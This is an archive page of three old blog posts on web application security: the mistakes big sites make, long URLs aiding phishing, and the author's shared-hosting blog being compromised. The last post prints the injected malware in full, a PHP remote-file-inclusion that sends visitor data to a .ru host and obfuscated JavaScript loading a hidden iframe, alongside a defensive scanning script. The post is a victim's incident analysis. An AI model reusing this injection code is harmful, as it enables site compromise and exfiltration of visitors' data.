Archive for the 'cracking' Category

Following the big dogs on web application security

Friday, December 21st, 2007

(This post originally appeared as part of the 2007 PHP Advent calendar)

At this time of year people are apt to get all warm and sentimental … Right up until their first trip to a mall on a Saturday when they go back to hating their fellow man and instituting an “If Amazon don’t sell it, you’re not getting it” policy on gift giving. December is very important to retail, and very important to retail sites.

I remember some good advice I read a long time ago. In Web Pages That Suck, Vincent Flanders and Michael Willis suggested you “follow the big dogs”; in other words, copy Amazon. Their reasoning was sound: you will likely get it wrong on your first try, you can’t afford to run usability studies of your own, and you don’t want to spend months and numerous iterations getting it right. Learning from other people’s mistakes is always less embarrassing than learning from your own.

I have had to paraphrase here, because I opted to recycle nearly all my old books rather than ship them halfway around the world. Had I wanted to check the accuracy of my quote, it would have cost me one cent to buy a second-hand copy of that book.

While the long-term relevance of most of the advice in old computer books is fairly accurately reflected by that valuation, it was good advice in 1998. If you were embarking on an ecommerce venture at a time when there was a shortage of people who knew what they were doing, best-practice conventions were not settled, and innovation was rapid, there were worse philosophies you could have had than “What Would Amazon Do?”

The same idea is popular today, and for the same reason. There is always a shortage of people who really know what they are doing, so there are plenty of people making decisions by asking “What Would Google/Amazon/Microsoft/eBay/PayPal/Flickr/Yahoo/YouTube/Digg/Facebook Do?” If you are in a space where nobody really knows the best way yet, copying the segment leader is a low-risk, low-talent shortcut to making mainly good decisions, even if it does mean you are always three months behind.

The idea does not apply well to web application security. There are two main reasons for this: first, the big dogs make plenty of mistakes, and second, good security is invisible.

You might notice mistakes, you might read about exploited vulnerabilities, and you might notice PR-based attempts at the illusion of security, but you probably don’t notice things quietly being done well.

Common big dog mistakes include:

  • Inviting people to click links in email messages.
    You would think that, as one of the most popular phishing targets out there, PayPal would not want to encourage people to click links in emails. Yet if you sign up for a PayPal account, the confirmation screen asks you to do exactly that.

    [Screenshot: the PayPal confirmation screen]

  • Stupid validation rules.
    We all want ways to reject bad data, but it is usually not easy to define hard and fast rules to recognize it, even for data with specific formatting. Everybody wants a simple regex to check that email addresses are well formed. Unfortunately, to permit every address that is valid according to RFC 2822, a simple one is not going to cut it, which means that many, many people add validation that is broken and rejects some real addresses. Most are not as stupid as the one AOL used to have for signing up for AIM, which insisted that all email addresses ended in .com, .net, .org, .edu or .mil, but many will reject + and other valid non-alphanumeric characters in the local part of an address (the bit before the @). A more forgiving approach is sketched after this list.
  • Stupid censorship systems.
    Simple keyword-based censorship always annoys people. Eventually, somebody named Woodcock is going to turn up (a trivial demonstration follows this list).
    Xbox Live is infamous for rejecting gamertags and mottos after validating them against an extensive list of “inappropriate” words. Going far beyond comedian George Carlin’s notorious Seven Dirty Words, there is a list of about 2700 words that are supposedly banned. By the time you add your regular seven, all possible misspellings thereof, most known euphemisms for body parts, racial epithets, drug-related terms, Microsoft brand names, Microsoft competitors’ brand names, terms that sound official, and start heading off into foreign languages, you end up catching a lot of innocent phrases.
  • Broken HTML filtering.
    Stripping all HTML from user-submitted content and safely displaying the result is often done badly, but it is not that difficult (see the escaping sketch after this list). On the other hand, allowing some HTML formatting as user input while disallowing the “dangerous” parts is not an easy problem, especially if you are trying to foster an ecosystem of third-party developers.

    The MySpace Samy worm worked not because MySpace failed to filter input, but because of a series of minor cracks that, combined, allowed arbitrary JavaScript. Once you choose to allow CSS so that users can add what passes for style on MySpace, it becomes very hard to limit people to only visual effects.

    eBay has had less well-known problems with a similar cause, but without a dramatic replicating worm. Earlier this year scammers were placing large transparent divs over their listings so that any click on the page triggered a mailto or loaded a page of their own. I could not see examples today, so I assume the specific vector has been fixed, but giving users a great deal of freedom to format the content they upload makes ensuring that content is safe for others to view very difficult.

  • Stupidly long URLs.
    The big dogs love long, complicated URLs.

          https://chat.bankofamerica.com/hc/LPBofA2/?visitor=&msessionkey=&cmd=file&file=chatFrame&site=LPBofA2&channel=web&d=1185830684250&referrer=%28engage%29%20https%3A//sitekey.bankofamerica.com/sas/signon.do%3F%26detect%3D3&sessionkey=H6678674785673531985-3590509392420069059K35197612

    Having let people get used to that sort of garbage from sites that they should be able to trust, you can’t really be surprised that normal people can’t tell the difference between an XSS attack hidden in URL encoded JavaScript and a real, valid, safe URI. Even abnormal people who can decode a few common URL encodings in their heads are not really scrolling across the hidden nine tenths of the address bar to look at that lot.

  • Looking for simple solutions.
    Security is not one simple problem, or even a set of simple problems, so looking for simple solutions such as the proposed .bank TLD is rarely helpful. This is not helped by the vendor-customer nature of much of the computer industry. The idea that you can write a check to somebody and a problem goes away is very compelling: buy a more expensive domain name, or a more expensive Extended Validation certificate, or run an automated software scan to meet PCI compliance, and you might sleep more soundly at night, but many users already don’t understand the URL and the other clues their browser gives them, so giving them more subtle clues is unlikely to help. Displaying a GIF in the corner of your web page bragging about your safety might create the illusion of security, and might well help sales, but it won’t actually improve safety on its own.
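
For the email example above, here is a minimal sketch of a more forgiving approach, assuming PHP 5.2 or later and a hypothetical helper name: let the filter extension do the work instead of inventing a fragile regex.

<?php
// FILTER_VALIDATE_EMAIL is far more permissive than most homemade
// regexes, and notably does not reject + in the local part.
function looks_like_email($address)
{
    return filter_var($address, FILTER_VALIDATE_EMAIL) !== false;
}

var_dump(looks_like_email('first.last+shopping@example.com')); // bool(true)
var_dump(looks_like_email('not an address'));                  // bool(false)

Even this is not a perfect match for the RFC 2822 grammar; the only test that really settles the question is whether mail sent to the address arrives.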
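
The censorship problem is just as easy to demonstrate. A sketch of a naive substring-based censor, with a hypothetical function name and a deliberately tiny banned list:

<?php
// Substring matching cannot tell a banned word from an innocent
// surname that happens to contain it.
function is_banned($text, $banned_words)
{
    foreach ($banned_words as $word) {
        if (stripos($text, $word) !== false) {
            return true;
        }
    }
    return false;
}

var_dump(is_banned('Woodcock', array('cock'))); // bool(true): an innocent name is rejected

Matching on word boundaries helps a little, but the underlying problem scales with the list: every one of those 2700 words catches more innocent phrases.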
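
As for HTML filtering, the easy, safe case really is easy: if you do not need to allow any markup at all, escape everything on output. A sketch, assuming UTF-8 content:

<?php
// Escape user-submitted text so the browser renders it as text, never
// as markup. ENT_QUOTES also escapes quotes, making the result safe
// inside attribute values.
$comment = '<script>alert(document.cookie)</script> great listing!';
echo htmlspecialchars($comment, ENT_QUOTES, 'UTF-8');
// Prints: &lt;script&gt;alert(document.cookie)&lt;/script&gt; great listing!

It is the other case, letting some HTML and CSS through, that needs a real parser, a whitelist and constant attention.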

You can’t follow the public example of the big dogs. They still make some dumb decisions; they still make the small mistakes that allow the CSRF and XSS exploits that are endemic; and they are often not very responsive to disclosures. If a major site makes 99 good security decisions and one bad one, you won’t notice the 99. Unfortunately, with security you are still far better off seeing how others have been exploited and critically evaluating what they say they should be doing, rather than trying to watch what they actually are doing.

Oh, and remember to stay away from malls on weekends in December.

Short, Clean URIs Are More Secure

Tuesday, July 31st, 2007

There are lots of reasons to use clean, short, readable URIs. Search engines like them. People have some hope of dictating or typing them correctly. Email clients are less likely to mung or truncate them. They give people navigational cues and an extra way to navigate a website. You can even fit them on one billboard (unlike, say, this one).

One generally ignored advantage is security.

Many phishing, XSS, CSRF and other URI-based exploits rely, at least in part, on putting stuff the user does not understand in the URI.

Here are a few real URIs from popular websites, all found inside a minute and within three clicks of the home page:

Having let people get used to that sort of garbage from sites that they should be able to trust, you can’t really be surprised that normal people can’t tell the difference between an XSS attack hidden in URL encoded JavaScript and a real, valid, safe URI. Even abnormal people who can decode a few common URL encodings in their heads are not really scrolling across the hidden nine tenths of the address bar to look at that lot.

It won’t help everybody. There are always going to be people who are happy to believe that their bank sends them email from a free address like bank.of.amerika@hotmail.com, and sufficiently sophisticated social engineering is always going to work on some people, some of the time, but the sites that are particularly popular with phishing attacks are making it unnecessarily easy.

If commonly used sites had short, sensible URIs, it would not take genius on the part of slightly cynical users to notice that every real bank URI they had seen in the past looked something like https://www.bankofamerica.com/myaccount/login, so the 300-character monstrosity full of percent symbols and ampersands that they were being presented with is a little on the fishy side.

Now, go and tidy your room.

Spyware and popups close to home

Monday, February 27th, 2006

It seems somebody, somewhere has a fine sense of irony. A few days ago I posted about a sleazy popup advertising vendor. Then on Sunday morning I looked at my blog to find that it had been altered: code had been inserted in numerous places to force downloads of a (presumably corrupt) WMF file from a website on a .ru domain.

My web host was really, really, remarkably useless, so I am a bit short on details. I think the most likely situation is that an automated script running somewhere on the shared web host was spidering from account to account and inserting its payload into files with .php or .html extensions wherever it found one writable by the webserver user.

There are a few obvious morals to this story.

  • There are scripts in the wild that target PHP sites on shared hosts. Be careful with yours.
  • Have as few files as possible writable by the webserver user on a shared host. I am sure you already knew this, but it can be hard because,
  • Writers of web apps, such as forums and blogs, require you to make some files and directories writable, so if you are choosing such software for a shared host, see if you can find one that requires as few writable files as possible, and
  • No matter how low your expectations are of the quality of support from a crappy <$10 per month web host, it is always possible for those expectations to be exceeded.

If you have rarely-checked stuff sitting on a shared host, it would be worth grepping it for some distinctive string from that code (perhaps “error_reporting(0)”) to make sure you are not in the same boat; a sketch of one way to do that follows.
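
A rough sketch of that check in PHP, useful on hosts where you have no shell access for a real grep. The path and the exact signature string are assumptions to adjust for your own setup.

<?php
// Walk a directory tree looking for the string the injected code used,
// and note which files the current user could overwrite. Run it as the
// webserver user to see what an attacker's script could have reached.
$root      = '/home/example/public_html'; // hypothetical path
$signature = 'error_reporting(0)';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root));
foreach ($files as $file) {
    if (!$file->isFile() || !preg_match('/\.(php|html?)$/i', $file->getFilename())) {
        continue;
    }
    $path = $file->getPathname();
    if (strpos(file_get_contents($path), $signature) !== false) {
        echo "possible infection: $path\n";
    }
    if (is_writable($path)) {
        echo "writable by this user: $path\n";
    }
}

Plenty of legitimate code calls error_reporting(0) too, so treat matches as a shortlist to eyeball rather than a verdict.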

The whole situation of course serves to make Aussie Hero Dale Begg-Smith all the more lovable in my eyes. For anybody who does not understand why people hate this sort of business practice and the arseclowns who practice it: it is because they make their money by wasting other people’s time. I spent half of my Sunday cleaning up this mess, and still have a few more domains to fix now (Monday night).

In case anybody is curious, the code generally looked like this:

// Suppress all errors so the infection stays quiet.
error_reporting(0);
// Collect the host, server name, request URI, user agent, client IP and
// referrer, falling back to register_globals-era variables.
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
// Pack everything into a base64-encoded query string for the attacker.
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".
base64_encode($g).".".base64_encode($h).".".base64_encode($n);
// The two base64 literals decode to "http://" and "user7.phpinclude.ru",
// so this is a remote file inclusion: whatever PHP that server returns
// gets executed here, on every request.
if((include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str)))
{}
else {
include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

or


<script language="javascript" type="text/javascript">
// Every character in k has been shifted up by 3 code points; the loop
// shifts them back down to reconstruct the hidden markup shown below.
var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@ %kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@ 4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}

which, de-obfuscated, is:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe
src="http://user19.iframe.ru/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1
marginwidth=0 marginheight=0 scrolling=no></iframe></div>

In one file I also found:

<a href = "http://mrsnebraskaamerica.com/catalog/images/sierra/hackmai-2.0.shtml" class=giepoaytr title="hackmai 2.0">hackmai 2.0</a>

There were also assorted files with generic-sounding names created, like date.php and report.php, and .htaccess files created or appended to in order to direct 404s to the new bogus files.